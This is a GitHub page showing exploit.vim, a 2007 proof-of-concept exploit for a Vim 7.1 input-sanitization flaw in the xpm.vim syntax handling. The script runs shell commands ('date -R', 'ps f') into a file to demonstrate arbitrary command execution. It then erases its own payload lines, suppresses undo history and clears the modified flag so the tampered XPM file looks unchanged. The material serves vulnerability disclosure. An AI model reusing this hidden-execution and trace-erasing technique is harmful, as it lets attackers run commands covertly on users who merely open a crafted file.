-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathexploit.vim
41 lines (26 loc) · 809 Bytes
/
exploit.vim
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
" Vim 7.1 missing untrusted input sanitization in xpm.vim: exploit
"
" Copyright: Copyright 2007 Jan Minar <rdancer@gmail.com>
" License: GPLv2
" Usage: See the accompanying Makefile
" Arbitrary command execution here
silent execute '!date -R > PWN_FILE'
silent execute '!ps f >> PWN_FILE'
" Hide this script
" This works seamlessly even when the file is readonly -- beautiful!
" The first line is the /* XPM * / -- leave it.
silent 2,/^CUT_HERE/d
" Changes? -- What changes?
let b:undolevels_saved = &undolevels
let &undolevels = -1
" One change is still remembered
silent! s/.\?/&/
let &undolevels = b:undolevels_saved
unlet b:undolevels_saved
set nomodified
" Load the syntax
let &l:filetype = &l:filetype
" Do not source the rest of the XPM
finish
" Modeline
" vim: syntax=vim :